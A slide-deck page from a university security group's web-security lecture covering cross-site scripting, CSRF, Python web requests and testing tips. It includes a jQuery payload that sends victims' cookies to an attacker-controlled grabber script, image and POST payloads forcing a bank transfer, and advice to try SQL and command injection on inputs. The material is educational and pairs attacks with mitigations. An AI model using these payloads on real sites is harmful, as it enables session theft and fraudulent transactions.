Cross Site Attacks
•
0 likes•54 views
An in-depth look at Cross Site Scripting and Cross Site Request Forgery. Also covers scripting web requests with Python.
Report
Share
Cross Site Attacks
- 1. WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas
- 3. Overview Exploits the trust a browser places in a site by running code (usually JS) in browser Reflected: user is tricked into running some code In URL: site.com/?msg=<script>… </script> Pasted into address bar Stored: the malicious code is stored persistently on the compromised website Unfiltered comments
- 4. Payloads and Goals Steal cookies Open a hidden IFRAME Spam advertisements Redirect to another page Click jacking Many more
- 5. Example Attack Uses jQuery <script>$.get(‘www.mysite.com/grabber .php?c=‘ + document.cookie);</script> A get request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.
- 7. Mitigation Developers Don’t allow users to post HTML Keep an eye out for places where attackers could modify what other peoples’ browsers render Users Use NoScript or similar whitelisting plugin Don’t click or paste a link with JavaScript in it
- 10. Overview Similar to XSS Exploits trust that servers place in browsers It’s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval Different than XSS, but XSS is often an attack vector for CSRF
- 11. Example Attack Images <img src=“bank.com/transfer.php? to=me&amount=1000000” /> XSS $.post(‘bank.com/transfer.php’, {to: ‘me’, amount: 1000000});
- 12. Mitigation Only trust requests from your domain Use CSRF protection tokens – included in many web frameworks Use the appropriate HTTP request, don’t use GET for something that modifies data Not much to do as a user
- 13. Python for Web
- 14. Python Web Scripts Python is a powerful scripting language. Some web problems are very repetitious. Using libraries urllib and urllib2.
- 15. Example Code import urllib import urllib2 url = 'http://www.someserver.com/cgi-bin/register.cgi' values = {'name' : 'Michael Foord', 'location' : 'Northampton', 'language' : 'Python' } data = urllib.urlencode(values) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read()
- 17. Mitigation Captchas Lockouts after several attempts
- 19. General Tips
- 20. Look at Requests! Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc. The idea is to find things we can alter The goal is to invalidate trust that the developer put in us
- 21. Inject Everything If your data goes into a database query, try SQL injection If you think it’s piping your input into a program, try command injection via && and the like If it looks like it’s rendering HTML, try some JavaScript
- 22. Questions?